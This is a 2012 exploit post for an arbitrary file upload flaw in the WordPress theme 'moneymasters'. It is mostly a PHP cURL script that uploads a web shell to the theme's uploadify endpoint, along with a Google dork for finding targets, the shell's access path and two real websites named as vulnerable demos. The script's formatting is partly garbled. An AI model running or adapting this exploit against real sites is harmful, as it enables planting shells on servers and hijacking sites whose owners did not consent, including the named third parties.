facebook facebook twitter rss

Wordpress Themes moneymasters Arbitrary File Upload Vulnerability

Author: Gastro-Dz , Published: 25-12-2012
-------------------------------------------------------------------------------
Wordpress Themes moneymasters Arbitrary File Upload Vulnerability
--------------------------------------------------------------------------------


###########################################################
# Author : Gastro-Dz #
# Date : 25/12/2012 #
# Facebook => http://fb.me/Gastr0 #
# Vandor : http://www.glothemes.com/moneymasters/ #
# Google Dork => inurl:/wp-content/themes/moneymasters #
# Tested on : Windows 7 , Kubuntu 11.0.4 #
###########################################################

Exploit : uploadshell.php

<?php
 
$uploadfile
="Gastro.php";
$ch curl_init("http://www.vulnsite.com");
curl_setopt($chCURLOPT_POSTtrue);
curl_setopt($chCURLOPT_POSTFIELDS,
              array(
'Filedata'=>"@$uploadfile",
              
'folder'=>'/wp-content/themes/moneymasters/code/uploadify/'));
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$postResult curl_exec($ch);
curl_close($ch);
 
  print 
"$postResult";
?> 


Shell Access : http://localhost/wordpress/wp-content/themes/moneymasters/code/uploadify/random_name.php
-------------------
<?php
phpinfo
();
?>

------------------------------

[#] Demos Vulnd sites :

http://themiza.com/wp-content/themes/moneymasters/code/uploadify/uploadify.php
http://www.vietbacsecurity.com/wp-content/themes/moneymasters/code/uploadify/uploadify.php

[#] Greeting ################################################################################################################
#
EvilDz - Hacker-1420 - Jago-dz - DamaneDz - Th3 killer Dz - HTC28DZ - Oxyl - Over-x - Asmar Dz-Root.com & Sec4Ever.com #
#
#############################################################################################################################

------------------------------ The End ---------------------------------------------------

Like us on Facebook :